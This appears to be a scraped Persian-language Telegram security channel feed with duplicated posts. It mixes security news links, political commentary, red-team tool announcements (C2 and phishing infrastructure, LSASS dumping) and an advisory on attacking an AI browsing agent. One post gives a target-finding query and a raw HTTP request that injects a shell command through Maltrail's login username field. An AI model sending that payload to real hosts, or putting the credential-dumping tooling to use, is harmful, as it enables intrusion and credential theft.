https://github.com/TryHackBox/Kaveh-WebDiff-Monitor
این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویسهای وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده میشود.
با استفاده از این اسکریپت میتوانید چندین IP/Port/Schema/Vhost را به صورت دورهای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید.
امیدوارم از این ابزار خوشتون بیاد و مفید باشه دوستان .
این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویسهای وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده میشود.
با استفاده از این اسکریپت میتوانید چندین IP/Port/Schema/Vhost را به صورت دورهای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید.
امیدوارم از این ابزار خوشتون بیاد و مفید باشه دوستان .
GitHub
GitHub - TryHackBox/Kaveh-WebDiff-Monitor: HTTP/S Service Monitor Script This Bash noscript periodically monitors the availability…
HTTP/S Service Monitor Script This Bash noscript periodically monitors the availability and content of web services (HTTP/HTTPS) specified in an input file. It checks each service at regular interva...
مجوز برای دزدی از مردم!
بانک مرکزی اعلام کرده است اگر مردم به «نهادهای مالی و اعتباری و صندوقهای قرضالحسنه» که مجوز از بانک مرکزی ندارند مراجعه کنند مسئولیت امر با خود مردم است!
این چه دولتی است که مانع فعالیت «نهادهای مالی و اعتباری و صندوقهای قرضالحسنه» بدون مجوز نمیشود و آنها آزادانه می توانند تبلیغ کنند و محل فعالیت خود را بخرند یا اجاره کنند و از مردم پول بگیرند؟!
آیا از اختیارات بانک مرکزی نیست که چنین نهادهای مالی را شناسایی و غیرمجاز بودن آنها را به دادستانی اعلام کند؟
آیا دادستانی مانند بخشنامههای سگگردانی نمیتواند به نیروی انتظامی ابلاغ کند فعالیت بنگاههای مالی را شناسایی کنند و مانع فعالیت آنها شوند؟!
تاکنون چند نهاد مالی بدون مجوز فعالیت کرده و بعد مدیران آنها فراری یا ورشکسته شدهاند و دولت با کمک همین بانک مرکزی از محل منابع مالی ملی بخشی از پولهای بهبادرفته را به صاحبان آنها برگردانده ولی بنیادگذاران این نهادهای بدون مجوز پولهای دزدیده شده از مردم را بین خود و حمایتگران وابسته به نظام تقسیم کردهاند؟!
بنظرم یک نگاه به زندان هایتان بیندازید و سبک و سنگین کنید ...
بانک مرکزی اعلام کرده است اگر مردم به «نهادهای مالی و اعتباری و صندوقهای قرضالحسنه» که مجوز از بانک مرکزی ندارند مراجعه کنند مسئولیت امر با خود مردم است!
این چه دولتی است که مانع فعالیت «نهادهای مالی و اعتباری و صندوقهای قرضالحسنه» بدون مجوز نمیشود و آنها آزادانه می توانند تبلیغ کنند و محل فعالیت خود را بخرند یا اجاره کنند و از مردم پول بگیرند؟!
آیا از اختیارات بانک مرکزی نیست که چنین نهادهای مالی را شناسایی و غیرمجاز بودن آنها را به دادستانی اعلام کند؟
آیا دادستانی مانند بخشنامههای سگگردانی نمیتواند به نیروی انتظامی ابلاغ کند فعالیت بنگاههای مالی را شناسایی کنند و مانع فعالیت آنها شوند؟!
تاکنون چند نهاد مالی بدون مجوز فعالیت کرده و بعد مدیران آنها فراری یا ورشکسته شدهاند و دولت با کمک همین بانک مرکزی از محل منابع مالی ملی بخشی از پولهای بهبادرفته را به صاحبان آنها برگردانده ولی بنیادگذاران این نهادهای بدون مجوز پولهای دزدیده شده از مردم را بین خود و حمایتگران وابسته به نظام تقسیم کردهاند؟!
بنظرم یک نگاه به زندان هایتان بیندازید و سبک و سنگین کنید ...
This media is not supported in your browser
VIEW IN TELEGRAM
🤖🔍اپراتور OpenAI - کلیک روی منبع دلخواه توسط حمله TOCTOU.
https://github.com/google/security-research/security/advisories/GHSA-mp56-7vrw-qxvf
@PfkSecurity
https://github.com/google/security-research/security/advisories/GHSA-mp56-7vrw-qxvf
@PfkSecurity
پیاده سازی زیرساخت تیم قرمز
پیاده سازی خودکار زیرساخت تیم قرمز با استفاده از GitHub Actions.
بر پایه اصولی که توسط Ralph May WarHorse گذاشته شده است.
این مجموعه ابزار، پیاده سازی خودکار زیرساخت تیم قرمز را با استفاده از جریانهای کاری GitHub Actions فراهم میکند. این ابزار از فدیم ورک های C2 قابل تنظیم و عملیات فیشینگ پشتیبانی میکند و بر پیاده سازی ایمن و قابل تکرار تأکید دارد.
https://github.com/CultCornholio/RedTeamTP
@PfkSecurity
پیاده سازی خودکار زیرساخت تیم قرمز با استفاده از GitHub Actions.
بر پایه اصولی که توسط Ralph May WarHorse گذاشته شده است.
این مجموعه ابزار، پیاده سازی خودکار زیرساخت تیم قرمز را با استفاده از جریانهای کاری GitHub Actions فراهم میکند. این ابزار از فدیم ورک های C2 قابل تنظیم و عملیات فیشینگ پشتیبانی میکند و بر پیاده سازی ایمن و قابل تکرار تأکید دارد.
https://github.com/CultCornholio/RedTeamTP
@PfkSecurity
GitHub
GitHub - CultCornholio/RedTeamTP
Contribute to CultCornholio/RedTeamTP development by creating an account on GitHub.
در جامعه ای که توهین به مقدسات مذهبی، پیامبران یا امامان میتواند حکم اعدام داشته باشد، چرا بیاحترامی به فردوسی احیاکننده زبان پارسی و نماد هویت ملی و شاهنامه شناسنامه فرهنگی ایران هیچ جرمی ندارد و حتی برای جذب ویو یا فالور تشویق میشود؟ این نابرابری نشاندهنده اولویتهای اشتباهی است که میراث هزارساله ایرانی را فدای ایدئولوژی میکند. خانم موسوی و حامیانش، با این "طنز" دمدستی، نه تنها به فردوسی توهین کرده اید، بلکه به ریشههای مشترک همه ایرانیان ضربه زدهاید. فردوسی با ۳۰ سال رنج، زبان و فرهنگ ما را زنده کرد. شما با یک کلیپ، آن را مسخره میکنید. شرم بر چنین "کمدی" که هویت ملی را قربانی میکند!
https://twitter.com/KavehxNet/status/1960703765188895147?s=19
https://twitter.com/KavehxNet/status/1960703765188895147?s=19
CVE-2025-34073
fofa app="Maltrail"
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=;
@PfkSecurity
fofa app="Maltrail"
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=;
ls@PfkSecurity
Red teaming tool to dump LSASS memory, bypassing basic countermeasures.
https://github.com/0xdea/blindsight
@PfkSecurity
https://github.com/0xdea/blindsight
@PfkSecurity
GitHub
GitHub - 0xdea/blindsight: Red teaming tool to dump LSASS memory, bypassing basic countermeasures.
Red teaming tool to dump LSASS memory, bypassing basic countermeasures. - 0xdea/blindsight
https://dinohacks.com/posts/2025/2025-03-17-defeating-string-obfuscation-in-obfuscated-nodejs-malware/
شکستن Obfuscation رشتهها در بدافزار NodeJS مبهم شده با استفاده از AST
در مقالهی «Defeating String Obfuscation in Obfuscated NodeJS Malware using AST» که در سایت DinoHacks منتشر شده، به روشی پرداخته می شود که از تحلیل ساختار نحوی کد (AST یا همان Abstract Syntax Tree) برای مقابله با رمزگذاری پیچیده رشته ها در بدافزارهای نوشته شده با NodeJS استفاده می کند.
خلاصه
⦁ بدافزارهای NodeJS اغلب کدهای خود را به صورت مبهم (Obfuscated) در می آورند تا تحلیلشان سخت شود، به خصوص رشتههای حساس مثل URLها، کلیدها یا کدهای کاری.
⦁ تحلیل دستی این رشتههای رمزگذاری شده زمانبر و پرخطاست.
⦁ با استفاده از AST، یعنی تبدیل کد به ساختار درختی نحو، میتوان رشتهها و متغیرهای رمزگذاری شده را شناسایی و مقادیر واقعی آنها را استخراج کرد.
⦁ این روش باعث می شود فرآیند تحلیل بدافزار سریعتر، دقیقتر و اتوماتیکتر شود.
⦁ در نهایت، این رویکرد، ابزار مفیدی برای محققان امنیتی و افراد مقابلهکننده با بدافزارهای NodeJS فراهم میکند تا بدون نیاز به بازنویسی دستی کل کد، به سرچشمه دادههای رمزگذاری شده برسند.
@PfkSecurity
شکستن Obfuscation رشتهها در بدافزار NodeJS مبهم شده با استفاده از AST
در مقالهی «Defeating String Obfuscation in Obfuscated NodeJS Malware using AST» که در سایت DinoHacks منتشر شده، به روشی پرداخته می شود که از تحلیل ساختار نحوی کد (AST یا همان Abstract Syntax Tree) برای مقابله با رمزگذاری پیچیده رشته ها در بدافزارهای نوشته شده با NodeJS استفاده می کند.
خلاصه
⦁ بدافزارهای NodeJS اغلب کدهای خود را به صورت مبهم (Obfuscated) در می آورند تا تحلیلشان سخت شود، به خصوص رشتههای حساس مثل URLها، کلیدها یا کدهای کاری.
⦁ تحلیل دستی این رشتههای رمزگذاری شده زمانبر و پرخطاست.
⦁ با استفاده از AST، یعنی تبدیل کد به ساختار درختی نحو، میتوان رشتهها و متغیرهای رمزگذاری شده را شناسایی و مقادیر واقعی آنها را استخراج کرد.
⦁ این روش باعث می شود فرآیند تحلیل بدافزار سریعتر، دقیقتر و اتوماتیکتر شود.
⦁ در نهایت، این رویکرد، ابزار مفیدی برای محققان امنیتی و افراد مقابلهکننده با بدافزارهای NodeJS فراهم میکند تا بدون نیاز به بازنویسی دستی کل کد، به سرچشمه دادههای رمزگذاری شده برسند.
@PfkSecurity
Dinohacks
Defeating String Obfuscation in Obfuscated NodeJS Malware using AST
Defeating String Obfuscation in NodeJS Malware using Babel AST Parser
https://www.preludesecurity.com/runtime-memory-protection
معرفی حفاظت از حافظه در زمان اجرا
پیشنمایش تحقیقاتی عامل ویندوز در حالت کاربر ما که به طور جامع اجرای کدهای مخرب را شناسایی میکند.
@PfkSecurity
معرفی حفاظت از حافظه در زمان اجرا
پیشنمایش تحقیقاتی عامل ویندوز در حالت کاربر ما که به طور جامع اجرای کدهای مخرب را شناسایی میکند.
@PfkSecurity
Preludesecurity
Introducing Runtime Memory Protection | Prelude
A research preview of our user-mode Windows agent that comprehensively catches malicious code execution.
این یک فازر پایه برای سندباکس V8 است
https://github.com/googleprojectzero/fuzzilli/commit/675eccd6b6d0c35ea6c7df24a0a1e513cce45bb3
@PfkSecurity
https://github.com/googleprojectzero/fuzzilli/commit/675eccd6b6d0c35ea6c7df24a0a1e513cce45bb3
@PfkSecurity
GitHub
Add V8SandboxFuzzer · googleprojectzero/fuzzilli@675eccd
This is a basic fuzzer for the V8 Sandbox. It uses the memory corruption
API to implement a random-but-deterministic (given a seed) traversal
through the V8 heap object graph and corrupts some obje...
API to implement a random-but-deterministic (given a seed) traversal
through the V8 heap object graph and corrupts some obje...
Forwarded from
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
💢 ۱۰ نفر اول میتوانند این کتاب را با قیمت ۲۰۰,۰۰۰ تومان تهیه کنند .
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
💢 ۱۰ نفر اول میتوانند این کتاب را با قیمت ۲۰۰,۰۰۰ تومان تهیه کنند .
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
نمونه_کتاب_وایرشارک_برای_ردتیمرها.pdf
1.4 MB
📘 کتاب "وایرشارک برای ردتیمرها"
راهنمای تخصصی تحلیل شبکه برای هکرهای اخلاقی و تیمهای قرمز
⚠️ توجه:
این فایل تنها نمونهای از صفحات کتاب است و برخی مطالب و آموزش ها به منظور حفظ اصالت اثر حذف شدهاند.
برای دریافت نسخهی کامل و دسترسی به تمامی تمرینها و سناریوها، میتوانید کتاب را به صورت کامل خریداری کنید.
توضیحات کتاب و قیمت
توضیحات کامل
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
راهنمای تخصصی تحلیل شبکه برای هکرهای اخلاقی و تیمهای قرمز
⚠️ توجه:
این فایل تنها نمونهای از صفحات کتاب است و برخی مطالب و آموزش ها به منظور حفظ اصالت اثر حذف شدهاند.
برای دریافت نسخهی کامل و دسترسی به تمامی تمرینها و سناریوها، میتوانید کتاب را به صورت کامل خریداری کنید.
توضیحات کتاب و قیمت
توضیحات کامل
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-and-cve-2024-50264.html
کرنل - تمرین هک و یک روش جدید برای exploiting از CVE-2024-50264 در هسته لینوکس
@PfkSecurity
کرنل - تمرین هک و یک روش جدید برای exploiting از CVE-2024-50264 در هسته لینوکس
@PfkSecurity
Forwarded from